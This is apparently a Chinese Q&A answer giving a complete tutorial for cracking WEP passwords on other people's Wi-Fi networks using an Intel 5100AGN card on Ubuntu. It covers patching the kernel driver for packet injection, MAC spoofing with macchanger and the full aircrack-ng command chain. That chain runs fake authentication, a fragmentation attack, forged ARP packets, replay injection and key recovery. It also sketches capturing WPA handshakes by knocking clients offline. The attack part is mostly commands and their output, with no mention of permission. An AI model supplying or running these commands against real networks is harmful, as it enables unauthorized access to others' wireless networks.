Linux下使用Intel_WiFi_Link_5100AGN 破解无线加密

就是传说中的BT4破解

ㄝㄙㄩㄧㄝ 回答:1 人气:16 解决时间:2010-02-24 14:55

满意答案

该网站为5100AGN 提供了支持注入的驱动升级,提供了C 源代码 和 diff 文件。
2. http://tinyshell.be/aircrackng/forum/index.php?topic=4217.0
该网站验证了5100AGN 能工作于注入模式,并提供升级网卡驱动的思路。
3. http://www.wlanbbs.com
中国无线论坛网,着重参考了“中卫”写的《BT3 破解无线WEP/WPA 教程》。
测试环境说明
1. 测试目的: 破解WEP 密码
2. 测试系统: Ubuntu Linux 8.10
3. 测试网卡: Intel WiFi Link 5100AGN
4. 破解软件: aircrack
5. 网卡驱动: Stefanik Gábor 2008 年9 月23 日写的驱动
XP 下的准备工作
Linux 下当然都能完成这些准备工作,不过是菜鸟么,怎么熟悉怎么来。
1. 安装 Ubuntu 8.10,新手建议在Windows 下使用wubi 直接安装,非常非常的方便!
2. http://kernel.org/pub/linux/kernel/v2.6/ 选择 linux‐2.6.27.7.tar.gz 下载。当然日后更新的
内核版本应该也能使用,目前能确认的是2.6.27‐rc7,2.6.27‐rc8 的内核版本都能使用。
3. http://git.kernel.org/?p=linux/kernel/git/linville/wireless‐testing.git;a=commit;h=84e8e77f61
8f589316e83dfa1bfafe5a47bf0bd2 下载3 个支持注入的5100AGN 的驱动源文件,名字为
iwl‐agn.c 和iwl‐sta.c 以及 iwl‐tx.c。
4. 为图方便,可以在XP 下查看好要破解WEP 的SSID、MAC 地址、工作信道等信息,并用
txt 文件保存好。
Ubuntu 下的准备工作
1. 装好的 Ubuntu 网卡驱动是直接支持5100AGN 的,只是不能工作在注入模式。首先还是
需要一个可用的网络来下载点东西。
2. 进入 root 权限。Ubuntu 默认情况不允许用root 帐户登陆,获得root 权限的方法很多,
讲个对日后操作最方便的方法。
首先,打开终端,输入指令sudo passwd root,设置新的root 帐户密码。
然后在左上角点击System‐>Preferences‐>Login Window 菜单,选择Security 选项,
接着选中其中的“Allow Local system administrator login”选项,确认设置。
最后Ctrl+Alt+退格,输入root 及密码重新登陆即可。
这样就永久获得了root 权限,可以在Ubuntu 中随意的用鼠标拷贝粘贴文件了。
3. sudo apt‐get install aircrack,安装破解软件aircrack
4. 下载一些配置要用的软件(如果并不想自己配置内核,可跳过)
sudo apt‐get install build‐essential bin86 kernel‐package
sudo apt‐get install libqt3‐headers libqt3‐mt‐dev
5. 稍等片刻,全部下载安装完成后,开始更新网卡驱动,编译 Linux 内核。
打开并解压缩下载的linux‐2.6.27.7 的内核,把解压后的文件整个拷贝到 /usr/src 的目录
下。在这个目录下,还会有几个别的版本的内核文件在呢。
打开这个新内核 /drivers/net/wireless/iwlwifi/,用下载的支持注入的iwl‐agn.c 和iwl‐sta.c
以及iwl‐tx.c 三个文件覆盖掉原来的文件。
6. sudo mv linux linux.bak,确保没有叫linux 的这个链接(好像和快捷方式的概念差不多)
sudo ln ‐s ./linux‐2.6.27.7 linux,把下载的新内核链接到linux
cd linux,进入linux 这个目录
7. 配置内核。配置内核是件困难的事情!参数繁多,一不小心就会导致升级失败。所以基
本思路是把当前内核配置文件拷贝过来一用。
sudo cp /boot/config‐`uname ‐r` .config,复制当前的内核配置。
sudo make xconfig,当然如果想自己再看看配置,微调一下也可以。然后会弹出一个配
置内核的窗口,对配置内核感兴趣的google,我基本没改。
8. 弄了份现成的配置文件,下一步就是编译了。为以后升级方便,先打包成 deb 包。
cd /usr/src/linux
sudo ‐s –H
make‐kpkg clean
sudo make‐kpkg ‐‐initrd –revision=diy1 kernel_image kernel_headers
最后行输入完毕后,编译需要一个多小时,在确认开始编译后,该干吗干吗去!
9. 安装新的内核。在你的耐心差不多消磨至尽的时候,破解的准备工作也到了最后一步了。
sudo dpkg ‐i /usr/src/kernel‐image‐2.6.27.7*.deb,安装内核包
sudo dpkg ‐i /usr/src/kernel‐headers‐2.6.27.7*.deb,安装内核headers 包
也非常有必要到/usr/src 中把这两个deb 文件给拷贝出来,下次重装Linux 升级可就不用
这么麻烦了。
sudo dpkg -i <name of the file&gt,设置grub 默认引导
现在重启一下,如果顺利,会自动进入2.6.27.7 的新内核。
破解WEP 密码
1. 做了这么多准备工作,终于可以开始动手做想做的事情了。建议大家先别急着输指令,
可以新建个文本文件,把要输入的指令,要破解的SSID 号,MAC 地址,信道等等全部
安安心心的用拷贝、粘贴大法全部清晰的输入好。
2. 新建一个终端
sudo –s
可省,输入密码后,进入root 权限。
lsmod
可省,查看驱动列表。反馈信息如下,可以在里面找到5100AGN 的驱动。
Module Size Used by
nls_iso8859_1 12288 1
nls_cp437 13952 1
vfat 18816 1
fat 57504 1 vfat
............
modinfo iwlagn
可省,查看网卡驱动的详情。反馈信息如下。
filename: /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/iwlagn.ko
alias: iwl4965
license: GPL
author: Copyright(c) 2003‐2008 Intel Corporation
version: 1.3.27ks
description: Intel(R) Wireless WiFi Link AGN driver for Linux
firmware: iwlwifi‐4965‐2.ucode
srcversion: xxxxxxxxxxxxxxxxxxxxxxx
ifconfig –a
可省,查看本机网卡详情。反馈信息如下
eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:219 Base address:0x8000
Lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:246 errors:0 dropped:0 overruns:0 frame:0
TX packets:246 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15408 (15.4 KB) TX bytes:15408 (15.4 KB)
pan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1492 Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5188 (5.1 KB) TX bytes:3895 (3.8 KB)
wmaster0 Link encap:UNSPEC HWaddr xx‐xx‐xx‐xx‐……
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
特别关注下深绿色标注的地方,wlan0 为网卡代号,xx:xx:xx:xx:xx:xx 为本机MAC。
airmon‐ng
可省,查看本机的网卡。反馈信息如下
Interface Chipset Driver
wlan0 iwlagn ‐ [phy0]
macchanger –m 00:11:22:33:44:55 wlan0
可省,修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时才有必要用吧,要用
的话需要下载一下的。
airmon‐ng start wlan0 6
必须的!让网卡在信道6 处监听信息。数字6 就是要破解AP 的工作信道(channel)。
Interface Chipset Driver
wlan0 iwlagn ‐ [phy0]
(monitor mode enabled on mon0)
会返回一个mon0 处于监听模式的提示,输入第二次的话会变成mon1,类推。
aireplay‐ng ‐9 mon0
可选,测试注入攻击。如果测试通过,破解WEP 就易如反掌了。反馈信息如下
21:00:55 Trying broadcast probe requests...
21:00:55 Injection is working!
21:00:56 Found 3 APs
……
如果第二行返回值是No Answer,可能原因有很多,其中包括网卡驱动的问题。
如果第二行返回值是Injection is working,就说明网卡已经工作在注入攻击模式下。
然后软件会去ping 每个找到的AP,这里可以得到信道上所有AP 的SSID、MAC、信道、
信号强度等等。
airodump‐ng –ivs –w name –c 6 mon0
必须的!抓ivs 包,name 为储存文件的名字,6 为信道,然后会有个一直在抓包的界面
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
xx:xx:xx:xx:xx:xx 179 3 159 0 0 6 54. WEP WEP T
特别关注 #Data 这栏,它的值就是抓到的ivs 的数量,目前涨的很慢,当我们在第二个
终端中敲几个指令后,就会发现它涨的飞快,过了1 万,就可以用第三个终端来破解密
码了!
3. 新建第二个终端,不要关掉第一个终端!
aireplay‐ng ‐1 0 ‐e TP‐LINK ‐a 000000000000 ‐h 111111111111 mon0
必须的!进行伪装链接,TP‐LINK 为要破解AP 的SSID,000000000000 为要破解AP 的
MAC 地址,111111111111 为本机网卡的MAC 地址,如果用macchanger 伪装过,就输
入伪装后的MAC 地址。
aireplay‐ng ‐5 ‐b 000000000000 ‐h 111111111111 mon0
必须的!获得至关重要的xor 文件,参数说明同上个指令。需要一点点抓有效包的时间。
成功以后输入y,会得到一个fragment‐XXXXX‐XXXXXX.xor 的文件,XXXXX 是数字。
packetforge‐ng ‐0 ‐a 000000000000 ‐h 111111111111 ‐k 255.255.255.255 ‐l 255.255.255.255
‐y fragment‐XXXXX‐XXXXXX.xor ‐w mrarp
必须的!参数说明同上个指令。fragment‐XXXXX‐XXXXXX.xor 就是上个指令中获得的文件。
aireplay‐ng ‐2 ‐r mrarp ‐x 1024 mon0
必须的!注入攻击。
此时第一个终端内的#Data 栏的值应该在飞速增长。
4. 新建第三个终端,前两个终端都不要关闭。
在 #Data 栏的数据达到10000 以上时,就可以破解了。
aircrack‐ng ‐n 64 ‐b 000000000000 name‐01.ivs
必须的!破解WEP 密码,000000000000 是要破解AP 的MAC 地址。
一般地,几秒内密码就出来了。如果对方的密码设置的比较牛,多抓些ivs 包后再破解
即可。保存好WEP 密码,退出三个终端。
破解WPA 密码
要破解WPA 密码,必须要抓到握手协议包。这个不难,基本思路是在有客户端的情况
下攻击该客户端使其断线,然后监听其重新联网时的握手协议包。可参考中国无线论坛网
“中卫”写的《BT3 破解无线WEP/WPA 教程》。
但WPA 只能暴力破解,如果没有任何关于密码的信息。光数字加小写字母的8 位密码
字典就能有几G 大小,要穷举这些密码,现在的电脑速度还远远不够。所以在没有任何关
于密码信息的情况下,要破解WPA 只能是浮云……这里也就没必要多介绍了。
破解WEP 密码总结
本人研究WEP 密码破解就此告一段落。从一个完全对破解和Linux 一窍不通的人,通过
论坛,google,到目前基本弄清了无线网加密技术及破解方法的基本思路和一些皮毛,还是
小有成就的。而意外接触Ubuntu 更是让我对Linux 兴趣大增,没想到Linux 已经变得如此方
便!以前望而却步的内核编译也算比较顺利的完成了,当然没玩什么配置,不过有了第一次
成功的体验,以后也就敢于慢慢深入了。
这次用5100AGN 破解WEP 密码最大的收获就是:如果想做一件事情,就多做少说,潜
心研究!尤其作为菜鸟,要少发问,多实践,有信心和耐心来攻破难题,定能成功!
全文完

Linux下使用Intel_WiFi_Link_5100AGN 破解无线加密相关推荐

  1. Kali Linux下口令字典破解WAP2加密小实验

    仅仅是一个新手的小实验,不具有实际意义,记录下流程.用口令字典是暴力破解,字典越大越好,上不封顶,实验测试我只用了一个常用很小的弱口令字典. 环境: win10笔记本 迅捷FAST FW150U US ...

  2. linux 下root 口令破解(二) ——说一下grub的密码和安全模式

    linux 下root 口令破解(二) ------说一下grub的密码和安全模式 我们都知道root的密码是保存在/etc/shadow下的,而/etc/passwd 则是用户信息文件,密码呢由于是 ...

  3. Linux 下 UltraEdit v15 破解 30 天试用限制

    Linux 下 UltraEdit v15 破解 30 天试用限制 OS 环境: Ubuntu 16.04 LTS Desktop arm64 UltraEdit 版本: UltraEdit Vers ...

  4. linux下使用openssl和md5sum加密文件或者字符串

    linux下使用openssl和md5sum加密文件或者字符串 前言 1 用oppnssl md5 加密字符串和文件的方法 1.1 oppnssl md5 加密字符串的方法 a.手动输入命令及过程如下 ...

  5. Linux下用hostapd架无线AP(转载)

    原网址:http://ihacklog.com/post/use-hostapd-to-setup-wireless-access-point-under-linux.html 本文将介绍在linux ...

  6. Linux下用hostapd架无线AP

    Published by 荒野无灯 on 2011-10-08 00:56:02 under 服务器/MySQL Tags: 路由,无线AP,hostapd 34452 views 本文将介绍在lin ...

  7. Thinkpad在Linux下指点杆和无线网络的配置和故障解决方法

    型号是Thinkpad R60i,系统为Fedora Linux 11,内核版本号:2.6.30.10 一.trackpoint 指点杆的调整 1.灵敏度的调整: 前文:指点杆(小红帽)是我最喜欢小黑 ...

  8. Linux下QT串口通过无线模块收发十六进制数据

    前段时间写了一个关于WiMi-Net简要的收发码以及CRC校验的博客(http://blog.csdn.net/u011348999/article/details/16803829) 然后一直说把Q ...

  9. macos\Linux下使用fcrackzip破解zip压缩文件密码

    加密解密:http://www.lybbn.cn/data/datas.php?yw=133 1.fcrackzip简介 fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便.破 ...

最新文章

  1. OpenCV基础知识入门
  2. SQL Server 文件和文件组
  3. 你知道为什么Xcode6中Swift没有智能提示和自己主动补全功能吗 ?
  4. java wait源码_Java精通并发-透过openjdk源码分析wait与notify方法的本地实现
  5. 传统蒙文字体_蒙古要改回使用传统回鹘蒙文,这是种什么文字,蒙古为什么要改回...
  6. python ddt
  7. python数据分析需要哪些库-用python进行数据分析的五个最常用库
  8. python----设计模式
  9. 全国各地市统计年鉴汇总2021
  10. McAfee卸载工具及卡巴KIS2009注册码
  11. python-scrapy模拟登陆网站--登陆青果教务管理系统(一)
  12. RabbitMQ整合SpringCloud
  13. iphone屏幕圆角插件_苹果iPhone6s也能分屏?越狱新插件助你实现
  14. ios9提取安装包ipa_支付宝9.9苹果版-ios支付宝9.9内测版下载ipa提取版-《百度网盘下载》西西软件下载...
  15. 国家开发银行软件测试工资待遇,一名省直公务员告诉你绝对准确的国家开发银行员工收入,与省厅公务员作详细对比...
  16. 满口春日清爽 书亦烧仙草刺梨新品上市
  17. ORACLE的sql语句查询一对一,一对多,多对多
  18. 学习编程的九个小白电脑知识
  19. java对接支付宝(四)-即时到账无秘退款
  20. asp毕业设计——基于asp+access的教师档案管理系统设计与实现(毕业论文+程序源码)——教师档案管理系统

热门文章

  1. 资深程序员雷总对代码的执念
  2. 100项目插件激活程序验证码,自行复制
  3. a eraser eraser还是an_是a eraser还是an eraser
  4. 错误1919配置ODBC数据源时发生错误Visio database samples,ODBC错误6:部件在注册
  5. speedoffice文档如何在方框内打钩
  6. 基督信仰与电脑软件 随笔
  7. UML各种箭头的含义
  8. mosquitto1.6.2 Error: A TLS error occurred.(解决)
  9. COSCon'22 第七届中国开源年会火热报名中,喜迎新一波赞助伙伴
  10. Android项目:基于安卓Android校园零食配送系统app(计算机毕业设计)